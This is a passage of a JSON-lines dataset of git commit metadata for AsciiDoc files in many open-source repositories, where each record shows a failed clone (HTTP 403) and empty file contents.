docs\n","repos":"nicolaferraro\/camel,tdiesler\/camel,zregvart\/camel,zregvart\/camel,apache\/camel,nikhilvibhav\/camel,gnodet\/camel,pax95\/camel,tadayosi\/camel,tadayosi\/camel,pax95\/camel,christophd\/camel,christophd\/camel,cunningt\/camel,tdiesler\/camel,adessaigne\/camel,alvinkwekel\/camel,tadayosi\/camel,pmoerenhout\/camel,christophd\/camel,cunningt\/camel,apache\/camel,cunningt\/camel,christophd\/camel,apache\/camel,tdiesler\/camel,alvinkwekel\/camel,adessaigne\/camel,gnodet\/camel,adessaigne\/camel,nikhilvibhav\/camel,adessaigne\/camel,tadayosi\/camel,zregvart\/camel,DariusX\/camel,alvinkwekel\/camel,tadayosi\/camel,christophd\/camel,ullgren\/camel,DariusX\/camel,tdiesler\/camel,cunningt\/camel,gnodet\/camel,mcollovati\/camel,adessaigne\/camel,nikhilvibhav\/camel,mcollovati\/camel,pax95\/camel,gnodet\/camel,cunningt\/camel,pax95\/camel,pmoerenhout\/camel,adessaigne\/camel,pmoerenhout\/camel,nicolaferraro\/camel,gnodet\/camel,mcollovati\/camel,nikhilvibhav\/camel,nicolaferraro\/camel,DariusX\/camel,zregvart\/camel,ullgren\/camel,apache\/camel,mcollovati\/camel,christophd\/camel,ullgren\/camel,pmoerenhout\/camel,apache\/camel,DariusX\/camel,tadayosi\/camel,pax95\/camel,tdiesler\/camel,pmoerenhout\/camel,ullgren\/camel,tdiesler\/camel,pmoerenhout\/camel,alvinkwekel\/camel,apache\/camel,cunningt\/camel,pax95\/camel,nicolaferraro\/camel","old_file":"components\/camel-aws2-ses\/src\/main\/docs\/aws2-ses-component.adoc","new_file":"components\/camel-aws2-ses\/src\/main\/docs\/aws2-ses-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b75f9d9b53c671c3a8941baf7484d0b7965dcf91","subject":"Update 2015-04-28-hello.adoc","message":"Update 2015-04-28-hello.adoc","repos":"therebelrobot\/blog-n.ode.rocks,therebelrobot\/blog-n.ode.rocks,therebelrobot\/blog-n.ode.rocks","old_file":"_posts\/2015-04-28-hello.adoc","new_file":"_posts\/2015-04-28-hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/therebelrobot\/blog-n.ode.rocks.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71bc949fd5b084d84973328d3c369510b554d5b2","subject":"Create 2016-06-19-Hello.adoc","message":"Create 2016-06-19-Hello.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2016-06-19-Hello.adoc","new_file":"_posts\/2016-06-19-Hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3599444ac0c97a9e5c45651d471ff9dd90bef9df","subject":"Update 2015-12-24-Write-the-f-docs.adoc","message":"Update 2015-12-24-Write-the-f-docs.adoc","repos":"smirnoffs\/smirnoffs.github.io,smirnoffs\/smirnoffs.github.io,smirnoffs\/smirnoffs.github.io","old_file":"_posts\/2015-12-24-Write-the-f-docs.adoc","new_file":"_posts\/2015-12-24-Write-the-f-docs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smirnoffs\/smirnoffs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d0e6d455adcaa427a5105929f94330c49e6c317","subject":"Update 
2016-01-04-Java-8-in-action.adoc","message":"Update 2016-01-04-Java-8-in-action.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-01-04-Java-8-in-action.adoc","new_file":"_posts\/2016-01-04-Java-8-in-action.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0947b38ac8da3b6f759141fdf8c4bd8a5a2d7c9d","subject":"Update 2016-02-07-Install-Logstash.adoc","message":"Update 2016-02-07-Install-Logstash.adoc","repos":"theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io","old_file":"_posts\/2016-02-07-Install-Logstash.adoc","new_file":"_posts\/2016-02-07-Install-Logstash.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/theofilis\/theofilis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34a37df0c8471cd5e47e32bd17ceaa3c968f8824","subject":"Update 2016-10-02-My-English-Title.adoc","message":"Update 2016-10-02-My-English-Title.adoc","repos":"crotel\/meditation,crotel\/meditation,crotel\/meditation,crotel\/meditation","old_file":"_posts\/2016-10-02-My-English-Title.adoc","new_file":"_posts\/2016-10-02-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crotel\/meditation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ff9ac56fb1fb5d38fcae59c587c76f85dbc2335","subject":"Update 2017-02-14-why-I-bake-bread.adoc","message":"Update 2017-02-14-why-I-bake-bread.adoc","repos":"thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io","old_file":"_posts\/2017-02-14-why-I-bake-bread.adoc","new_file":"_posts\/2017-02-14-why-I-bake-bread.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thomaszahr\/thomaszahr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59cf41637c8f0ab0977be0f2104d058fff0f5580","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/on_reading.adoc","new_file":"content\/writings\/on_reading.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"26019b6625f2a5340dd67f04d9919950925e5518","subject":"Update 2015-12-14-AB-testing.adoc","message":"Update 2015-12-14-AB-testing.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-12-14-AB-testing.adoc","new_file":"_posts\/2015-12-14-AB-testing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35541c99b816245e53361f31e17164d37c0801ff","subject":"Update 2016-10-12-hubpress-r.adoc","message":"Update 
2016-10-12-hubpress-r.adoc","repos":"pokev25\/pokev25.github.io,pokev25\/pokev25.github.io,pokev25\/pokev25.github.io,pokev25\/pokev25.github.io","old_file":"_posts\/2016-10-12-hubpress-r.adoc","new_file":"_posts\/2016-10-12-hubpress-r.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pokev25\/pokev25.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd32204ca170ca451e46663f389c7b7358754fe6","subject":"Update 2017-05-19-swift-chat.adoc","message":"Update 2017-05-19-swift-chat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-19-swift-chat.adoc","new_file":"_posts\/2017-05-19-swift-chat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f6d1283553fef5cd135d48e304cad0cdfd9e907","subject":"Update 2016-04-21-.adoc","message":"Update 2016-04-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-21-.adoc","new_file":"_posts\/2016-04-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb06095c2b5822c06a57890764b01c3e2f91802b","subject":"Update 2016-07-05-slack-book-event.adoc","message":"Update 2016-07-05-slack-book-event.adoc","repos":"KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io","old_file":"_posts\/2016-07-05-slack-book-event.adoc","new_file":"_posts\/2016-07-05-slack-book-event.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KozytyPress\/kozytypress.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0b48cc8b71921b1cb7603f337e35998438a7d6c","subject":"Update 2017-02-24-Google-Extension.adoc","message":"Update 2017-02-24-Google-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-24-Google-Extension.adoc","new_file":"_posts\/2017-02-24-Google-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62793fb9e2d9a448c43dcc65029c1bb0ecfb9f51","subject":"updated Changelog","message":"updated Changelog\n","repos":"sdaschner\/jaxrs-analyzer,cthiebaud\/jaxrs-analyzer,cthiebaud\/jaxrs-analyzer","old_file":"Changelog.adoc","new_file":"Changelog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cthiebaud\/jaxrs-analyzer.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"732c2903d32da21e3d4cfb2a26bfdbf2db19a65f","subject":"Update README","message":"Update README\n","repos":"pjanouch\/sdtui,pjanouch\/sdtui","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/sdtui.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"cc0b3639afd9e617ba908582d3b0ed9c2eb87f61","subject":"Python note: Retriving path for a module","message":"Python note: Retriving path for a module\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"404c1a4072499f5743915e827ccb55ddbd6f30c2","subject":":memo: Close #4: README","message":":memo: Close #4: README\n","repos":"ljacomet\/terracotta-platform,chrisdennis\/terracotta-platform,Terracotta-OSS\/terracotta-platform,anthonydahanne\/terracotta-platform,Terracotta-OSS\/terracotta-platform,albinsuresh\/terracotta-platform,lorban\/terracotta-platform,mathieucarbou\/terracotta-platform,AbfrmBlr\/terracotta-platform,anthonydahanne\/terracotta-platform,albinsuresh\/terracotta-platform,chrisdennis\/terracotta-platform,ljacomet\/terracotta-platform,rkavanap\/terracotta-platform,jd0-sag\/terracotta-platform","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chrisdennis\/terracotta-platform.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e1ec59043ebb32e1e5f0c5821f3ecb33e4b0ced0","subject":"Update README","message":"Update README\n","repos":"pjanouch\/ell","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/ell.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"fdd66fe87387b27e456128dd627bba7373cff84e","subject":"Init doc","message":"Init doc\n","repos":"mgreau\/docker4dev-tennistour-app,mgreau\/docker4dev-tennistour-app,mgreau\/docker4dev-tennistour-app","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/docker4dev-tennistour-app.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9eb47de7e3ae7da8db149e3683a3ad7e1ac3c26","subject":"Update README","message":"Update README\n","repos":"pjanouch\/sdtui,pjanouch\/sdtui","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/sdtui.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"2023e29a38a381ddb2a383d67c80267a69198d8e","subject":"README.adoc gets link to API.adoc","message":"README.adoc gets link to API.adoc","repos":"sirjorj\/libxwing","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sirjorj\/libxwing.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} 
{"commit":"4fa98abec391fd03e11ec404d819b2bd5584e854","subject":"Figure out bash","message":"Figure out bash\n","repos":"pjanouch\/sdn","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/sdn.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"cae762d46dfb22d8a1afa77445a1f8b97b1a8315","subject":"Update Tomcat instructions","message":"Update Tomcat instructions\n","repos":"prateepb\/spiracle,waratek\/spiracle,waratek\/spiracle,waratek\/spiracle,prateepb\/spiracle,prateepb\/spiracle","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateepb\/spiracle.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a334e95516b0444789daf94cc1bba91f0a49d0ab","subject":"Add README","message":"Add README\n","repos":"IanDarwin\/javawebmail,IanDarwin\/javawebmail","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/IanDarwin\/javawebmail.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"5ba3039bbb9b1f92f0e23b5e4e99afee7fe893a2","subject":"Update roadmap in readme","message":"Update roadmap in readme\n\nSigned-off-by: jaa127 <5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>\n","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f618936de07f30d6f8d15facd7355f6f36333b35","subject":"add README","message":"add README\n","repos":"struberg\/javaConfig","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/struberg\/javaConfig.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"03818265205533b8d62f5134bd6392759bfb19cd","subject":"README","message":"README\n","repos":"iDoka\/eda-scripts,iDoka\/eda-scripts","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iDoka\/eda-scripts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bccb00e0bed5432c373f29fe8596ba4aa968edea","subject":"[doc] Add a link to the FAQ (we cannot use includes)","message":"[doc] Add a link to the FAQ (we cannot use includes)\n","repos":"jenkinsci\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin,jenkinsci\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenkinsci\/pipeline-maven-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a96562b3558454dbd715b177b9d446877fd6a62","subject":"Added README in AsciiDoc format. github supports adoc","message":"Added README in AsciiDoc format. 
github supports adoc\n","repos":"benignbala\/pod-asciidoctor","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/benignbala\/pod-asciidoctor.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9e37d2a7e8133ac75fc64f427351a5145f3b835e","subject":"add readme","message":"add readme\n","repos":"Mikulas\/transpiler,Mikulas\/transpiler","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mikulas\/transpiler.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b6a9cfcf4addc74a012d506975358eefdf63618","subject":"Reformatted README to AsciiDoc.","message":"Reformatted README to AsciiDoc.\n","repos":"Yubico\/libu2f-server,Yubico\/libu2f-server","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/libu2f-server.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"57beb5e26dd003942169e316c8a0b98364d39dac","subject":"removed accidentally included example doc file","message":"removed accidentally included example doc file\n\nSigned-off-by: Dan Mack <f52cae7d677fd8a83ac7cc4406c1d073a69a7b23@macktronics.com>\n","repos":"danmack\/resume","old_file":"example.adoc","new_file":"example.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danmack\/resume.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed58fc7f65ed42d6e452f26d55d230b71cf8d464","subject":"Delete README-es.adoc","message":"Delete README-es.adoc","repos":"crotel\/meditation,crotel\/meditation,crotel\/meditation,crotel\/meditation","old_file":"README-es.adoc","new_file":"README-es.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crotel\/meditation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1bd1ebc0c8aa9ace744c0f02d0a944948e3ced99","subject":"Add myself as contributor","message":"Add myself as contributor\n","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,jakubjab\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain","old_file":"src\/docs\/manual\/05_contributors.adoc","new_file":"src\/docs\/manual\/05_contributors.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5d99d06e427e8dfc40cce006a667a6092a46bbed","subject":"[README] First version of the asciidoc file.","message":"[README] First version of the asciidoc file.\n\nSigned-off-by: St\u00e9phane Galland <23860b554af9116d4237121086bd6767cdd4ff4b@arakhne.org>\n","repos":"tpiotrow\/afc,DevFactory\/afc,tpiotrow\/afc,tpiotrow\/afc,gallandarakhneorg\/afc,DevFactory\/afc,DevFactory\/afc,tpiotrow\/afc,DevFactory\/afc,gallandarakhneorg\/afc,gallandarakhneorg\/afc,gallandarakhneorg\/afc,gallandarakhneorg\/afc","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tpiotrow\/afc.git\/': The requested 
URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f402819fbdee311ad1d9a14df6e99339b6037468","subject":"add readme","message":"add readme\n\nasciidoc > markdown\n","repos":"concourse\/turbine","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/concourse\/turbine.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3a22b518435655423d8c396b7f059da3785d7296","subject":"Changed Email address to a github based address","message":"Changed Email address to a github based address\n","repos":"skaterkamp\/szoo-faces,skaterkamp\/szoo-faces,skaterkamp\/szoo-faces,skaterkamp\/szoo-faces","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skaterkamp\/szoo-faces.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dfabcc7af04b0b447ece7e313016642b5fd58ced","subject":"updated docs to reflect changes to schema mode","message":"updated docs to reflect changes to schema mode\n","repos":"djangonauts\/django-hstore,Stranger6667\/django-hstore,pombredanne\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore,djangonauts\/django-hstore,pombredanne\/django-hstore,pombredanne\/django-hstore,djangonauts\/django-hstore,pombredanne\/django-hstore,Stranger6667\/django-hstore,Stranger6667\/django-hstore","old_file":"doc\/doc.asciidoc","new_file":"doc\/doc.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/djangonauts\/django-hstore.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f99ed31ecc91df3cb284fcaa9bf7fd254f40c7b","subject":"Update 2017-06-30-C-S-S-Because-tuyu.adoc","message":"Update 2017-06-30-C-S-S-Because-tuyu.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-30-C-S-S-Because-tuyu.adoc","new_file":"_posts\/2017-06-30-C-S-S-Because-tuyu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5c8a65ad9f3e99f7c71d4bcb6e939afe8bff8f7","subject":"Update javaee7-websocket-api-html5-en.adoc","message":"Update javaee7-websocket-api-html5-en.adoc","repos":"mgreau\/javaee7-websocket,jthmiranda\/javaee7-websocket,jthmiranda\/javaee7-websocket,jthmiranda\/javaee7-websocket,mgreau\/javaee7-websocket,mgreau\/javaee7-websocket","old_file":"doc\/javaee7-websocket-api-html5-en.adoc","new_file":"doc\/javaee7-websocket-api-html5-en.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/javaee7-websocket.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36e46235ed0b1b556a44cdecd3d53dc75c45a8ef","subject":"First check-in of protocol and reverse engineering documentation","message":"First check-in of protocol and reverse engineering 
documentation\n","repos":"Br3nda\/libfitbit,kalon33\/libfitbit,openyou\/libfitbit","old_file":"doc\/fitbit_protocol.asciidoc","new_file":"doc\/fitbit_protocol.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kalon33\/libfitbit.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"efc62f193f0830c8061a632498c5ac81d1e43c6e","subject":"Docs: fix health response test","message":"Docs: fix health response test\n\nI managed to test the wrong snippet before pushing the last\ncommit.... This fixes the error in it.\n","repos":"naveenhooda2000\/elasticsearch,Stacey-Gammon\/elasticsearch,lks21c\/elasticsearch,maddin2016\/elasticsearch,nezirus\/elasticsearch,lks21c\/elasticsearch,uschindler\/elasticsearch,wangtuo\/elasticsearch,wenpos\/elasticsearch,scorpionvicky\/elasticsearch,winstonewert\/elasticsearch,fred84\/elasticsearch,alexshadow007\/elasticsearch,shreejay\/elasticsearch,nazarewk\/elasticsearch,rajanm\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,sneivandt\/elasticsearch,maddin2016\/elasticsearch,strapdata\/elassandra,LeoYao\/elasticsearch,masaruh\/elasticsearch,brandonkearby\/elasticsearch,qwerty4030\/elasticsearch,jprante\/elasticsearch,shreejay\/elasticsearch,nazarewk\/elasticsearch,s1monw\/elasticsearch,kalimatas\/elasticsearch,umeshdangat\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,vroyer\/elassandra,nazarewk\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,s1monw\/elasticsearch,gingerwizard\/elasticsearch,alexshadow007\/elasticsearch,pozhidaevak\/elasticsearch,winstonewert\/elasticsearch,alexshadow007\/elasticsearch,strapdata\/elassandra,glefloch\/elasticsearch,markwalkom\/elasticsearch,Stacey-Gammon\/elasticsearch,jimczi\/elasticsearch,naveenhooda2000\/elasticsearch,pozhidaevak\/elasticsearch,uschindler\/elasticsearch,LeoYao\/elasticsearch,umeshdangat\/elasticsearch,mohit\/elasticsearch,glefloch\/elasticsearch,wenpos\/elasticsearch,nezirus\/elasticsearch,jimczi\/elasticsearch,naveenhooda2000\/elasticsearch,masaruh\/elasticsearch,markwalkom\/elasticsearch,sneivandt\/elasticsearch,wenpos\/elasticsearch,glefloch\/elasticsearch,sneivandt\/elasticsearch,robin13\/elasticsearch,nazarewk\/elasticsearch,scottsom\/elasticsearch,mjason3\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nazarewk\/elasticsearch,umeshdangat\/elasticsearch,rajanm\/elasticsearch,gfyoung\/elasticsearch,wangtuo\/elasticsearch,winstonewert\/elasticsearch,LeoYao\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,vroyer\/elassandra,nezirus\/elasticsearch,jprante\/elasticsearch,jprante\/elasticsearch,Stacey-Gammon\/elasticsearch,mohit\/elasticsearch,rajanm\/elasticsearch,shreejay\/elasticsearch,brandonkearby\/elasticsearch,wangtuo\/elasticsearch,jimczi\/elasticsearch,coding0011\/elasticsearch,lks21c\/elasticsearch,scottsom\/elasticsearch,qwerty4030\/elasticsearch,fred84\/elasticsearch,LeoYao\/elasticsearch,fred84\/elasticsearch,jimczi\/elasticsearch,kalimatas\/elasticsearch,nknize\/elasticsearch,wangtuo\/elasticsearch,GlenRSmith\/elasticsearch,pozhidaevak\/elasticsearch,uschindler\/elasticsearch,s1monw\/elasticsearch,Stacey-Gammon\/elasticsearch,mjason3\/elasticsearch,winstonewert\/elasticsearch,scottsom\/elasticsearch,strapdata\/elassandra,robin13\/elasticsearch,glefloch\/elasticsearch,rajanm\/elasticsearch,gfyoung\/elasticsear
ch,brandonkearby\/elasticsearch,mohit\/elasticsearch,maddin2016\/elasticsearch,gingerwizard\/elasticsearch,sneivandt\/elasticsearch,GlenRSmith\/elasticsearch,masaruh\/elasticsearch,jprante\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,strapdata\/elassandra,wenpos\/elasticsearch,mjason3\/elasticsearch,Stacey-Gammon\/elasticsearch,rajanm\/elasticsearch,brandonkearby\/elasticsearch,qwerty4030\/elasticsearch,masaruh\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,vroyer\/elasticassandra,LeoYao\/elasticsearch,markwalkom\/elasticsearch,mohit\/elasticsearch,shreejay\/elasticsearch,naveenhooda2000\/elasticsearch,jimczi\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,vroyer\/elasticassandra,wangtuo\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,wenpos\/elasticsearch,shreejay\/elasticsearch,scottsom\/elasticsearch,alexshadow007\/elasticsearch,mjason3\/elasticsearch,scorpionvicky\/elasticsearch,vroyer\/elasticassandra,markwalkom\/elasticsearch,pozhidaevak\/elasticsearch,gingerwizard\/elasticsearch,umeshdangat\/elasticsearch,vroyer\/elassandra,fred84\/elasticsearch,naveenhooda2000\/elasticsearch,mohit\/elasticsearch,lks21c\/elasticsearch,scottsom\/elasticsearch,rajanm\/elasticsearch,LeoYao\/elasticsearch,sneivandt\/elasticsearch,strapdata\/elassandra,kalimatas\/elasticsearch,coding0011\/elasticsearch,maddin2016\/elasticsearch,mjason3\/elasticsearch,markwalkom\/elasticsearch,scorpionvicky\/elasticsearch,umeshdangat\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,lks21c\/elasticsearch,jprante\/elasticsearch,brandonkearby\/elasticsearch,s1monw\/elasticsearch,gingerwizard\/elasticsearch,glefloch\/elasticsearch,robin13\/elasticsearch,nezirus\/elasticsearch,fred84\/elasticsearch,LeoYao\/elas